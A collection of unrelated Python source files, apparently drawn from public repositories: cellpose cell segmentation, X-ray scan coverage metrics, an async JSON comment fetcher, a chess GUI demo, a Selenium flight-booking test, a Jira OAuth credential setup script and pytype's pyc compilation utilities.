"""Display cellpose results for each image
"""
for image_number, image in enumerate(images):
maski = masks[image_number]
flowi = flows[image_number][0]
fig = plt.figure(figsize=(12,5))
plot.show_segmentation(fig, image, maski, flowi, channels=channels)
plt.tight_layout()
plt.show()
def edge_filter(mask):
"""Collect boundary pixel values for all edges, return unique values
which correspond to cells that are touching/over the edge boundaries"""
size = mask.shape[0]
edge_1_cells = set(list(mask[0:1, 0:size].flatten()))
edge_2_cells = set(list(mask[0:size, (size-1):size].flatten()))
edge_3_cells = set(list(mask[(size-1):size, 0:size].flatten()))
edge_4_cells = set(list(mask[0:size, 0:1].flatten()))
return edge_1_cells | edge_2_cells | edge_3_cells | edge_4_cells
def size_filter(mask, lower_size=1500, upper_size=10000):
"""Collect cells that are outside the cell size bounds as those to
be excluded"""
cell_size = dict(collections.Counter(mask.flatten()))
bs_cells = [
cell_number
for cell_number, cell_size in cell_size.items()
if cell_size < lower_size or cell_size > upper_size
]
return set(bs_cells)
# --------------------------------------Initialise file list--------------------------------------
file_list = [filename for filename in os.listdir(input_folder) if '.tif' in filename]
# reading in all channels for each image, and transposing to correct dimension of array
imgs = [skimage.io.imread(f'{input_folder}{filename}').transpose(1, 2, 0) for filename in file_list]
# clean filenames
img_names = [filename.replace('.tif', '') for filename in file_list]
# -----------------------Complete cellpose with cytoplasm channel---------------------------------
# channel 0: Venus ----> use this for making masks
# channel 1: Bright field
# channel 2: mTFP
# channel 3: FRET
# channel 4: inclusions
# collecting only channel 0's for masking
cytoplasm_images = [image[:, :, 0] for image in imgs]
plt.imshow(cytoplasm_images[0])
# Apply cellpose then visualise
masks, flows, styles, diams = apply_cellpose(cytoplasm_images, image_type='cyto', diameter=50)
visualise_cell_pose(cytoplasm_images, masks, flows, channels=[0, 0])
# -----------------------If NES image, use inversion of venus channel to define nuclei---------------------------------
nuc_masks, nuc_flows, nuc_styles, nuc_diams = apply_cellpose([65000 - array for array in cytoplasm_images], image_type='nuclei', diameter=20)
visualise_cell_pose([65000 - array for array in cytoplasm_images], nuc_masks, nuc_flows, channels=[0, 0])
# -----------------------outline inclusions---------------------------------
incl_images = [image[:, :, 4] for image in imgs]
plt.imshow(incl_images[0])
incl_masks, incl_flows, incl_styles, incl_diams = apply_cellpose(incl_images, image_type='nuclei', diameter=20)
visualise_cell_pose(incl_images, incl_masks, incl_flows, channels=[0, 0])
# save associated cell mask arrays
np.save(f'{output_folder}cellpose_masks.npy', masks)
np.save(f'{output_folder}cellpose_nuclei.npy', nuc_masks)
np.save(f'{output_folder}cellpose_inclusions.npy', incl_masks)
|
<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# #########################################################################
# Copyright (c) 2016, UChicago Argonne, LLC. All rights reserved. #
# #
# Copyright 2016. UChicago Argonne, LLC. This software was produced #
# under U.S. Government contract DE-AC02-06CH11357 for Argonne National #
# Laboratory (ANL), which is operated by UChicago Argonne, LLC for the #
# U.S. Department of Energy. The U.S. Government has rights to use, #
# reproduce, and distribute this software. NEITHER THE GOVERNMENT NOR #
# UChicago Argonne, LLC MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR #
# ASSUMES ANY LIABILITY FOR THE USE OF THIS SOFTWARE. If software is #
# modified to produce derivative works, such modified software should #
# be clearly marked, so as not to confuse it with the version available #
# from ANL. #
# #
# Additionally, redistribution and use in source and binary forms, with #
# or without modification, are permitted provided that the following #
# conditions are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of UChicago Argonne, LLC, Argonne National #
# Laboratory, ANL, the U.S. Government, nor the names of its #
# contributors may be used to endorse or promote products derived #
# from this software without specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY UChicago Argonne, LLC AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL UChicago #
# Argonne, LLC OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, #
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER #
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN #
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
# #########################################################################
"""Objects and methods for computing coverage based quality metrics.
These methods are based on the scanning trajectory only.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright (c) 2016, UChicago Argonne, LLC."
__docformat__ = 'restructuredtext en'
__all__ = ['coverage_approx']
import logging
from xdesign.acquisition import beamintersect, thv_to_zxy
from xdesign.recon import get_mids_and_lengths
logger = logging.getLogger(__name__)
def tensor_at_angle(angle, magnitude):
"""Return 2D tensor(s) with magnitude(s) at the angle [rad]."""
R = np.array([[np.cos(angle), -np.sin(angle)],
[np.sin(angle), np.cos(angle)]])
tensor = np.array([[1, 0], [0, 0]])
tensor = np.einsum('...,jk->...jk', magnitude, tensor)
return np.einsum('ij,...jk,lk->...il', R, tensor, R)
def coverage_approx(
gmin,
gsize,
ngrid,
probe_size,
theta,
h,
v,
weights=None,
anisotropy=1,
num_rays=16
):
"""Approximate procedure coverage with a Riemann sum.
The intersection between the beam and each pixel is approximated by using a
Reimann sum of `n` rectangles: width `beam.size / n` and length `dist`
where `dist` is the length of segment of the line `alpha` which passes
through the pixel parallel to the beam.
If `anisotropy` is `True`, then `coverage_map.shape` is `(M, N, 2, 2)`,
where the two extra dimensions contain coverage anisotopy information as a
second order tensor.
Parameters
----------
procedure : :py:class:`.Probe` generator
A generator which defines a scanning procedure by returning a sequence
of Probe objects.
region : :py:class:`np.array` [cm]
A rectangle in which to map the coverage. Specify the bounds as
`[[min_x, max_x], [min_y, max_y]]`. i.e. column vectors pointing to the
min and max corner.
pixel_size : float [cm]
The edge length of the pixels in the coverage map in centimeters.
n : int
The number of lines per beam
anisotropy : bool
Whether the coverage map includes anisotropy information
Returns
-------
coverage_map : :py:class:`numpy.ndarray`
A discretized map of the Probe coverage.
See also
--------
:py:func:`.plot.plot_coverage_anisotropy`
"""
if weights is None:
weights = np.ones(theta.shape)
assert weights.size == theta.size == h.size == v.size, "theta, h, v must be" \
"the equal lengths"
coverage_map = np.zeros(list(ngrid) + [anisotropy])
# split the probe up into bunches of rays
line_offsets = np.linspace(0, probe_size, num_rays) - probe_size / 2
theta = np.repeat(theta.flatten(), line_offsets.size)
h = h.reshape(h.size, 1) + line_offsets
h = h.flatten()
v = np.repeat(v.flatten(), line_offsets.size)
weights = np.repeat(weights.flatten(), line_offsets.size)
# Convert from theta,h,v to x,y,z
srcx, srcy, detx, dety, z = thv_to_zxy(theta, h, v)
# grid frame (gx, gy)
sx, sy = ngrid[0], ngrid[1]
gx = np.linspace(gmin[0], gmin[0] + gsize[0], sx + 1, endpoint=True)
gy = np.linspace(gmin[1], gmin[1] + gsize[1], sy + 1, endpoint=True)
for m in range(theta.size):
# get intersection locations and lengths
xm, ym, dist = get_mids_and_lengths(
srcx[m], srcy[m], detx[m], dety[m], gx, gy
)
if np.any(dist > 0):
# convert midpoints of line segments to indices
ix = np.floor(sx * (xm - gmin[0]) / gsize[0]).astype('int')
iy = np.floor(sy * (ym - gmin[1]) / gsize[1]).astype('int')
ia = np.floor((theta[m] / (np.pi / anisotropy) % anisotropy)
).astype('int')
ind = (dist != 0) & (0 <= ix) & (ix < sx) \
& (0 <= iy) & (iy < sy)
# put the weights in the binn
coverage_map[ix[ind], iy[ind], ia] += dist[ind] * weights[m]
pixel_area = np.prod(gsize) / np.prod(ngrid)
line_width = probe_size / num_rays
return coverage_map * line_width / pixel_area
|
<reponame>evilyach/comment-tree-py<gh_stars>0
#!/usr/bin/python3
import argparse
import json
import sys
import select
import aiohttp
import asyncio
import copy
class CommentTree:
''' Class to add comments to an existing JSON file. '''
def __init__(self, filename):
'''
Object constructor.
Args:
filename (str): Name of a JSON file.
Attributes:
filename (str): Name of a JSON file.
json_data (dict): A JSON file represented in a Python dictionary.
bodies (dict): A dictionary of comment bodies.
urls (list<str>): A list of URLs
'''
self.filename = filename
self.json_data = self.get_json_data(self.filename)
if self.json_data is None:
return
self.bodies = {}
self.urls = []
self.process(self.json_data)
def __str__(self):
''' Returns string representation of a Comment Tree '''
return json.dumps(self.json_data, indent=4)
def get_json_data(self, filename):
'''
Get JSON data from any stdin source.
Can either provide data via pipe:
$ cat ./test/test.json | ./comment-tree.py
or via command line argument:
$ ./comment-tree.py --file ./test/test.json
We check if there is stdin data by using select. That, unfortunately, only
works on *nix machines and looks very ugly.
Args:
filename (str): Name of a JSON file.
Returns:
dict: A JSON file represented in a Python dictionary.
'''
if filename:
with open(filename) as json_file:
try:
json_data = json.load(json_file)
return json_data
except:
print(f"Could not read any JSON data from '{filename}'!")
return None
# This select is the only way I found to check if stdin is empty or not
elif select.select([sys.stdin, ], [], [], 0.0)[0]:
try:
json_data = json.load(sys.stdin)
return json_data
except:
print('Could not read any JSON data from stdin!')
return None
else:
print(f"No input data was provided! Check '{sys.argv[0]} --help'")
return None
def get_urls(self, data):
'''
Iterate through a JSON tree and get id values to form a URLs list.
Args:
data (dict): a JSON tree to get id values from.
'''
for key, value in data.items():
if key == 'id':
self.urls.append(
f'https://jsonplaceholder.typicode.com/posts/{value}')
if key == 'replies':
for element in value:
self.get_urls(element)
def add_comments(self, data):
'''
Iterate through a JSON tree and put comment bodies into it.
Args:
data (dict): a JSON tree to put comment bodies into.
'''
for key, value in data.copy().items():
if key == 'id':
if self.bodies[value]:
data['body'] = self.bodies[value]
if key == 'replies':
for element in value:
self.add_comments(element)
async def fetch(self, url, session):
'''
Fetch data from URL inside a session.
This function only uses 'id' and 'body' fields.
Args:
url (str): a URL to fetch data from.
session (aiohttp.client.ClientSession): a client session.
'''
async with session.get(url) as response:
data = await response.json()
if data:
self.bodies[data['id']] = data['body']
else:
self.bodies[data['id']] = None
async def bound_fetch(self, semaphore, url, session):
'''
Invokes a fetch guarded with a semaphore.
Args:
semaphore (asyncio.locks.Semaphore): a semaphore guard.
url (str): a URL to fetch data from.
session (aiohttp.client.ClientSession): a client session.
'''
async with semaphore:
await self.fetch(url, session)
async def run(self):
''' Builds a session which invokes asyncronous calls to fetch data. '''
semaphore_count = 1000
tasks = []
semaphore = asyncio.Semaphore(semaphore_count)
async with aiohttp.ClientSession() as session:
for url in self.urls:
task = asyncio.ensure_future(
self.bound_fetch(semaphore, url, session))
tasks.append(task)
await asyncio.gather(*tasks)
def process(self, data):
'''
Add comment bodies to a JSON dict.
It works by iterating through the JSON tree and retrieving data using
JSON placeholder API.
Args:
data (dict): A JSON represented in a Python dictionary.
'''
# The first run is to get the indeces for URLs
self.get_urls(self.json_data)
# Fetch URLs asynchronously
loop = asyncio.get_event_loop()
future = asyncio.ensure_future(self.run())
loop.run_until_complete(future)
# The second run is to add comment bodies
self.add_comments(self.json_data)
def parse_args():
'''
Parse command line arguments.
Returns:
argparse.Namespace: Command line arguments
'''
parser = argparse.ArgumentParser(
description='Get comments for you JSON file')
parser.add_argument('--file', type=str,
help='input JSON filename')
parser.add_argument('--save', type=str,
help='output JSON filename')
return parser.parse_args()
def main():
''' Entry point of an app '''
args = parse_args()
comment_tree = CommentTree(args.file)
if (args.save):
with open(args.save, "w+") as json_file:
json_file.write(str(comment_tree))
else:
print(comment_tree)
if __name__ == "__main__":
main()
|
# chessgame.py
# Copyright 2021 <NAME>
# Licence: See LICENCE (BSD licence)
"""Demonstrate chess game class and methods to display PGN text, board, and
analysis as it appears without an active chess engine."""
if __name__ == "__main__":
import tkinter
from pgn_read.core.parser import PGN
from ..gui import fonts
from ..gui.game import Game
from .chessscore import DuckUI
class DuckStatusbar:
"""Helper to allow Game instances to work without a real UI."""
def set_status_text(self, *a, **k):
pass
class DuckqueueQueue:
"""Helper to allow Game instances to work without a real UI."""
def put(self, *a):
pass
class DuckcoreuciUCI:
"""Helper to allow Game instances to work without a real UI."""
ui_analysis_queue = DuckqueueQueue()
position_analysis = {}
class DuckguiuciUCI:
"""Helper to allow Game instances to work without a real UI."""
uci = DuckcoreuciUCI()
class DuckUI(DuckUI):
"""Helper to allow Game instances to work without a real UI."""
show_analysis = True
visible_scrollbars = True
# None is legal but the default analysis does not get shown in the
# analysis widget.
database = False
def make_position_analysis_data_source(self):
return None
statusbar = DuckStatusbar()
uci = DuckguiuciUCI()
# Maybe the real generate_popup_navigation_maps can be declared somewhere
# else, even if duplicated, to avoid this.
# An empty Navigation entry is put in the popup menu.
class Game(Game):
binding_labels = ()
def generate_popup_navigation_maps(self):
return {}, {}
root = tkinter.Tk()
root.wm_minsize(width=900, height=600)
f = fonts.make_chess_fonts(root)
root.wm_title("Demonstrate Game")
root.pack_propagate(False)
# Use DuckUI.
g = Game(master=root, ui=DuckUI(root))
del f
g.collected_game = next(
PGN().read_games(
"".join(
(
'[Event"National Club: Gosport - Wood Green"]',
'[Site"Gosport"]',
'[Date"1989-05-07"]',
'[Round"QFinal"]',
'[White"S<NAME> J"]',
'[Black"Marsh R"]',
'[Result"1-0"]',
"e4(d4d5c4e6Nc3)c6d4d5exd5cxd5c4Nf6c5e6Nc3b6b4a5Bf4",
"axb4Nb5Na6Qa4;comment to eol\nBd7",
"Bc7Nxc5Qd1Qc8dxc5bxc5Nf3Qb7Nd6Bxd6Bxd6Qb6Be5Ke7Be2Ne4O-Of6Bb2Nc3",
"Bxc3bxc3Qd3(Qb3)Ra3Rfb1Qa7Qc2g6Rb3d4Bc4Rxb3Bxb3Qa6a4Rb8a5e5Bd5",
"\n%The escape sequence\nRb2",
"Qe4Bf5Qh4Qd3(c2(g5)Nd2Qxa5Rxa5Rb1{Comment\ncontaining newline}Nf1",
"(Nxb1c1=Q)Rxf1Kxf1Bd3)g4Rb1",
"Rxb1Qxb1Kg2Kd6Qxf6Kxd5<reserved\n\nfor future use>Qxe5",
"Kc6gxf5Qxf5Qe8Kc7Qe7Kc8Ne5c2Qxc5Kd8Qxd4",
"Ke8Qe3Kf8Kg3Qc8Nd3Kg8f4Qc6Nc1Qa4Qb3",
"1-0",
"\n",
)
)
)
)
g.set_and_tag_item_text()
# The get_top_widget method and takefocus_widget attribute are defined in
# Game class to keep them out of AnalysisScore instances.
g.get_top_widget().pack(fill=tkinter.BOTH, expand=tkinter.TRUE)
g.score.focus_set()
del g
root.mainloop()
|
import unittest
import re
from time import sleep
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from selenium.webdriver.support import expected_conditions as econd
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import apiritif
import selenium_taurus_extras
_vars = {}
_tpl = selenium_taurus_extras.Template(_vars)
_vars['name'] = 'Name'
_vars['red_pill'] = 'take_it'
class TestRequests(unittest.TestCase):
def setUp(self):
options = webdriver.FirefoxOptions()
profile = webdriver.FirefoxProfile()
profile.set_preference('webdriver.log.file', '<somewhere>/webdriver.log')
self.driver = webdriver.Firefox(profile, firefox_options=options)
self.driver.implicitly_wait(3.5)
self.wnd_mng = selenium_taurus_extras.WindowManager(self.driver)
def tearDown(self):
self.driver.quit()
def test_requests(self):
self.driver.implicitly_wait(3.5)
with apiritif.transaction('/'):
self.driver.get('http://blazedemo.com/')
WebDriverWait(self.driver, 3.5).until(econd.presence_of_element_located((By.XPATH, _tpl.apply("//input[@type='submit']"))), 'Element "//input[@type=\'submit\']" failed to appear within 3.5s')
self.assertEqual(self.driver.title, _tpl.apply('BlazeDemo'))
ActionChains(self.driver).move_to_element(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[2]/div/p[2]/a'))).perform()
ActionChains(self.driver).double_click(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/h2'))).perform()
ActionChains(self.driver).click_and_hold(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/form/select[1]'))).perform()
ActionChains(self.driver).release(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[3]/form/select[1]/option[6]'))).perform()
Select(self.driver.find_element(By.NAME, _tpl.apply('toPort'))).select_by_visible_text(_tpl.apply('London'))
self.driver.find_element(By.CSS_SELECTOR, _tpl.apply('body input.btn.btn-primary')).send_keys(Keys.ENTER)
self.assertEqual(self.driver.find_element(By.ID, _tpl.apply('address')).get_attribute('value'), _tpl.apply('123 Beautiful st.'))
self.assertEqual(self.driver.find_element(By.XPATH, _tpl.apply('/html/body/div[2]/form/div[1]/label')).get_attribute('innerText'), _tpl.apply('${name}'))
WebDriverWait(self.driver, 3.5).until(econd.visibility_of_element_located((By.NAME, _tpl.apply('toPort'))), "Element 'toPort' failed to appear within 3.5s")
self.driver.find_element(By.NAME, _tpl.apply('toPort')).send_keys(_tpl.apply('B'))
self.driver.find_element(By.XPATH, _tpl.apply('//div[3]/form/select[1]//option[3]')).click()
self.driver.find_element(By.XPATH, _tpl.apply('//div[3]/form/select[2]//option[6]')).click()
self.wnd_mng.switch(_tpl.apply('0'))
self.wnd_mng.switch(_tpl.apply('win_ser_local'))
self.wnd_mng.switch(_tpl.apply('win_ser_1'))
self.wnd_mng.switch(_tpl.apply('that_window'))
self.wnd_mng.close(_tpl.apply('1'))
self.wnd_mng.close(_tpl.apply('win_ser_local'))
self.wnd_mng.close(_tpl.apply('win_ser_1'))
self.wnd_mng.close(_tpl.apply('that_window'))
self.driver.find_element(By.NAME, _tpl.apply('toPort')).submit()
self.driver.execute_script(_tpl.apply("alert('This is Sparta');"))
self.driver.switch_to.frame(self.driver.find_element(By.NAME, _tpl.apply('my_frame')))
self.driver.switch_to.frame(1)
if self.driver.find_element(By.ID, _tpl.apply('editor')).get_attribute('contenteditable'): self.driver.find_element(By.ID, _tpl.apply('editor')).clear(); self.driver.find_element(By.ID, _tpl.apply('editor')).send_keys(_tpl.apply('lo-la-lu'))
sleep(3)
self.driver.delete_all_cookies()
self.driver.find_element(By.LINK_TEXT, _tpl.apply('destination of the week! The Beach!')).click()
body = self.driver.page_source
re_pattern = re.compile(r'contained_text')
self.assertEqual(0, len(re.findall(re_pattern, body)), "Assertion: 'contained_text' found in BODY")
with apiritif.transaction('empty'):
pass
|
# Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates OAuth credentials for a given Jira server, and optionally
saves those credentials to Google Secret Manager. This is a one-time
setup script that generates the credentials necessary for a client to
connect to a Jira server. It must be ran manually.
How to use:
Show help message:
$ python3 jira_oauth_setup_script.py --help
Write Jira OAuth credentials to output files:
$ python3 jira_oauth_setup_script.py JIRA_URL
Write Jira OAuth credentials to output files and Google Secret Manager:
$ python3 jira_oauth_setup_script.py --gcp_project_id="PROJECT_ID" JIRA_URL
Supply your own RSA keys in files named `private.pem` and `public.pem` (can be
used to skip resetting up the Jira application link when running the script a
second time either to update the OAuth credentials or due to the script failing
halfway through the first run):
$ python3 jira_oauth_setup_script.py --load_keys JIRA_URL
Specify the consumer key to use for Jira OAuth authorization:
$ python3 jira_oauth_setup_script.py --consumer_key="CONSUMER_KEY" JIRA_URL
"""
import argparse
from requests_oauthlib import OAuth1Session
from oauthlib.oauth1 import SIGNATURE_RSA
from Crypto.PublicKey import RSA
from google.cloud import secretmanager
from google.api_core.exceptions import AlreadyExists
def create_secret(client, gcp_project_id, secret_id):
"""Create a new secret with the given name in Secret Manager. A secret
is a logical wrapper around a collection of secret versions. Secret
versions hold the actual secret material.
Args:
client: A Secret Manager client to use to create the secret
gcp_project_id: The id of the Google Cloud project in which to
create the secret
secret_id: The name of the secret to create
"""
parent = client.project_path(gcp_project_id)
response = client.create_secret(parent, secret_id, {
'replication': {
'automatic': {},
},
})
print('Created secret: {}'.format(response.name))
def add_secret_version(client, gcp_project_id, secret_id, payload):
"""
Add a new secret version to the given secret with the provided payload.
Args:
client: A Secret Manager client to use to add the secret version
gcp_project_id: The id of the Google Cloud project in which to
add the secret version
secret_id: The name of the secret to add a new version to
payload: The payload of the new secret version
"""
parent = client.secret_path(gcp_project_id, secret_id)
if isinstance(payload, str):
payload = payload.encode('UTF-8')
response = client.add_secret_version(parent, {'data': payload})
print('Added secret version: {}'.format(response.name))
def main():
# Parse command line arguments
parser = argparse.ArgumentParser(
description=('Generate OAuth credentials for a given Jira server, and optionally '
'saves those credentials to Google Secret Manager. This is a one-time '
'setup script that generates the credentials necessary for a client to '
'connect to a Jira server. It must be ran manually.'))
parser.add_argument('jira_url',
help=('URL of the Jira Server to setup OAuth for, e.g '
'https://jira.atlassian.com'))
parser.add_argument('--gcp_project_id',
help=('ID of the Google Cloud project whose Secret Manager '
'to store Jira OAuth credentials in.'))
parser.add_argument('--consumer_key',
help=('Consumer key to use for Jira OAuth authorization. '
'If not specified, default is "CloudMonitoringOauthKey"'),
default='CloudMonitoringOauthKey')
parser.add_argument('--load_keys',
action='store_true',
help=('Load already generated private/public RSA keys called '
'"private.pem" and "public.pem"'))
args = parser.parse_args()
# Create or load in RSA public and private keys
if args.load_keys:
with open('private.pem', 'rb') as f:
private_key_pem = f.read()
with open('public.pem', 'rb') as f:
public_key_pem = f.read()
print("RSA public and private keys loaded")
else:
private_key = RSA.generate(2048)
private_key_pem = private_key.exportKey('PEM')
with open('private.pem', 'wb') as f:
f.write(private_key_pem)
public_key = private_key.publickey()
public_key_pem = public_key.exportKey('PEM')
with open('public.pem', 'wb') as f:
f.write(public_key_pem)
print("RSA public and private keys created")
# Setup Jira Oauth
application_links_url = f'{args.jira_url}/plugins/servlet/applinks/listApplicationLinks'
print(f"""\nComplete the following steps:
1. In Jira, navigate to Jira Settings > Applications > Application Links
OR go to {application_links_url}
2. In the 'Enter the URL of the application you want to link' field, enter
http://example.com/ , and then click 'Create new link'. Ignore the 'No response was
received from the URL you entered' warning that is displayed and click 'Continue'
3. On the first screen of the 'Link applications' dialog, enter 'Cloud Monitoring App' for
'Application Name', select the 'Create incoming link' checkbox, and click 'Continue'
4. On next screen of the 'Link applications' dialog, enter the following consumer details:
* Consumer Key: {args.consumer_key}
* Consumer Name: Cloud Monitoring App
* Public Key:\n{public_key_pem.decode('utf-8')}
5: Click 'Continue'
(Note the previous steps are based off of the instructions at https://developer.atlassian.com/server/jira/platform/oauth/#create-an-application-link)
""")
input('Once complete, press "Enter" to proceed\n')
oauth = OAuth1Session(args.consumer_key,
signature_method=SIGNATURE_RSA,
rsa_key=private_key_pem,
signature_type='auth_header',
verifier='jira_verifier')
request_token_url = f'{args.jira_url}/plugins/servlet/oauth/request-token'
fetch_response = oauth.fetch_request_token(request_token_url)
oauth_token = fetch_response.get('oauth_token')
oauth_token_secret = fetch_response.get('oauth_token_secret')
base_authorization_url = f'{args.jira_url}/plugins/servlet/oauth/authorize'
authorization_url = oauth.authorization_url(base_authorization_url)
print(f'Go to the following URL and click allow: {authorization_url}\n')
input('Once complete, press "Enter" to proceed\n')
access_token_url = f'{args.jira_url}/plugins/servlet/oauth/access-token'
oauth_tokens = oauth.fetch_access_token(access_token_url)
oauth_token = oauth_tokens.get('oauth_token')
oauth_token_secret = oauth_tokens.get('oauth_token_secret')
with open('jira_access_token.txt', 'w') as f:
f.write(oauth_token)
print('Jira access token stored in jira_access_token.txt')
with open('jira_access_token_secret.txt', 'w') as f:
f.write(oauth_token_secret)
print('Jira access token secret stored in jira_access_token_secret.txt')
# Store Oauth data necessary to authorize Jira client in Google Secret Manager
if args.gcp_project_id:
client = secretmanager.SecretManagerServiceClient()
try:
create_secret(client, args.gcp_project_id, 'jira_access_token')
except AlreadyExists:
print('Secret named "jira_access_token" already exists; adding new '
'secret version with the new access token')
try:
create_secret(client, args.gcp_project_id, 'jira_access_token_secret')
except AlreadyExists:
print('Secret named "jira_access_token_secret" already exists; adding new '
'secret version with the new access token secret')
try:
create_secret(client, args.gcp_project_id, 'jira_consumer_key')
except AlreadyExists:
print('Secret named "jira_consumer_key" already exists; adding new '
'secret version with the new consumer key')
try:
create_secret(client, args.gcp_project_id, 'jira_key_cert')
except AlreadyExists:
print('Secret named "jira_key_cert" already exists; adding new '
'secret version with the new key cert')
add_secret_version(client, args.gcp_project_id, 'jira_access_token', oauth_token)
add_secret_version(client, args.gcp_project_id, 'jira_access_token_secret', oauth_token_secret)
add_secret_version(client, args.gcp_project_id, 'jira_consumer_key', args.consumer_key)
add_secret_version(client, args.gcp_project_id, 'jira_key_cert', private_key_pem)
print("Successfully setup Jira OAuth")
if __name__ == '__main__':
main()
|
"""Functions for generating, reading and parsing pyc."""
import copy
import os
import re
import subprocess
import tempfile
from typing import List, Tuple
from pytype import compat
from pytype import pytype_source_utils
from pytype import utils
from pytype.pyc import compile_bytecode
from pytype.pyc import loadmarshal
from pytype.pyc import magic
import six
COMPILE_SCRIPT = "pyc/compile_bytecode.py"
COMPILE_ERROR_RE = re.compile(r"^(.*) \((.*), line (\d+)\)$")
class CompileError(Exception):
"""A compilation error."""
def __init__(self, msg):
super().__init__(msg)
match = COMPILE_ERROR_RE.match(msg)
if match:
self.error = match.group(1)
self.filename = match.group(2)
self.lineno = int(match.group(3))
else:
self.error = msg
self.filename = None
self.lineno = 1
def compile_src_string_to_pyc_string(
src, filename, python_version, python_exe: Tuple[List[str], List[str]],
mode="exec"):
"""Compile Python source code to pyc data.
This may use py_compile if the src is for the same version as we're running,
or else it spawns an external process to produce a .pyc file. The generated
bytecode (.pyc file) is read and both it and any temporary files are deleted.
Args:
src: Python sourcecode
filename: Name of the source file. For error messages.
python_version: Python version, (major, minor).
python_exe: Tuple of a path to a Python interpreter and command-line flags.
mode: Same as builtins.compile: "exec" if source consists of a
sequence of statements, "eval" if it consists of a single expression,
or "single" if it consists of a single interactive statement.
Returns:
The compiled pyc file as a binary string.
Raises:
CompileError: If we find a syntax error in the file.
IOError: If our compile script failed.
"""
if utils.can_compile_bytecode_natively(python_version):
output = six.BytesIO()
compile_bytecode.compile_src_to_pyc(src, filename or "<>", output, mode)
bytecode = output.getvalue()
else:
tempfile_options = {"mode": "w", "suffix": ".py", "delete": False}
if six.PY3:
tempfile_options.update({"encoding": "utf-8"})
else:
tempfile_options.update({"mode": "wb"})
fi = tempfile.NamedTemporaryFile(**tempfile_options) # pylint: disable=consider-using-with
try:
if six.PY3:
fi.write(src)
else:
fi.write(src.encode("utf-8"))
fi.close()
# In order to be able to compile pyc files for a different Python version
# from the one we're running under, we spawn an external process.
# We pass -E to ignore the environment so that PYTHONPATH and
# sitecustomize on some people's systems don't mess with the interpreter.
exe, flags = python_exe
cmd = exe + flags + ["-E", "-", fi.name, filename or fi.name, mode]
compile_script_src = pytype_source_utils.load_binary_file(COMPILE_SCRIPT)
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) as p:
bytecode, _ = p.communicate(compile_script_src)
assert p.poll() == 0, "Child process failed"
finally:
os.unlink(fi.name)
first_byte = six.indexbytes(bytecode, 0)
if first_byte == 0: # compile OK
return bytecode[1:]
elif first_byte == 1: # compile error
code = bytecode[1:] # type: bytes
raise CompileError(compat.native_str(code))
else:
raise IOError("_compile.py produced invalid result")
def parse_pyc_stream(fi):
"""Parse pyc data from a file.
Args:
fi: A file-like object.
Returns:
An instance of loadmarshal.CodeType.
Raises:
IOError: If we can't read the file or the file is malformed.
"""
magic_word = fi.read(2)
python_version = magic.magic_word_to_version(magic_word)
crlf = fi.read(2) # cr, lf
if crlf != b"\r\n":
raise IOError("Malformed pyc file")
fi.read(4) # timestamp
if python_version >= (3, 3):
# This field was introduced in Python 3.3
fi.read(4) # raw size
return loadmarshal.loads(fi.read(), python_version)
def parse_pyc_string(data):
"""Parse pyc data from a string.
Args:
data: pyc data
Returns:
An instance of loadmarshal.CodeType.
"""
return parse_pyc_stream(six.BytesIO(data))
class AdjustFilename:
"""Visitor for changing co_filename in a code object."""
def __init__(self, filename):
self.filename = filename
def visit_code(self, code):
code.co_filename = self.filename
return code
def compile_src(src, filename, python_version, python_exe, mode="exec"):
"""Compile a string to pyc, and then load and parse the pyc.
Args:
src: Python source code.
filename: The filename the sourcecode is from.
python_version: Python version, (major, minor).
python_exe: Tuple of the path to Python interpreter and command-line flags.
mode: "exec", "eval" or "single".
Returns:
An instance of loadmarshal.CodeType.
Raises:
UsageError: If python_exe and python_version are mismatched.
"""
pyc_data = compile_src_string_to_pyc_string(
src, filename, python_version, python_exe, mode)
code = parse_pyc_string(pyc_data)
if code.python_version != python_version:
raise utils.UsageError(
"python_exe version %s does not match python version %s" %
(utils.format_version(code.python_version),
utils.format_version(python_version)))
visit(code, AdjustFilename(filename))
return code
def visit(c, visitor):
"""Recursively process constants in a pyc using a visitor."""
if hasattr(c, "co_consts"):
